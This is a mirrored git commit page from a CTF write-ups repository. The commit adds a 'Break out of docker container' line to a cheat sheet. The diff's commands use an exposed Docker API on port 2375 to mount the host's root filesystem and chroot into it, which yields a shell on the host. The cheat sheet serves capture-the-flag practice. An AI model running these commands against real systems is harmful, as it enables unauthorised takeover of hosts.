mirror of
https://github.com/AbdullahRizwan101/CTF-Writeups
synced 2024-11-22 12:03:03 +00:00
Update Cheat Sheet.md
This commit is contained in:
parent
ed4c79b032
commit
402ee8b7d7
1 changed files with 2 additions and 0 deletions
|
@ -485,6 +485,8 @@ To start a container from a remote machine <br/>
|
|||
`docker -H <ip>:2375 exec -it <container-id> /bin/sh`<br/>
|
||||
To start a container from a remote machine using name and tags<br/>
|
||||
`docker -H <ip>:2375 run -v /:/mnt --rm -it alpine:3.9 chroot /mnt sh`<br/>
|
||||
Break out of docker container
|
||||
`docker -H tcp://<ip>:2375 run --rm -it -v /:/host <container_name> chroot /host bash`
|
||||
# Miscellaneous
|
||||
|
||||
## Turning off xfce beeping sound
|
||||
|
|
Loading…
Reference in a new issue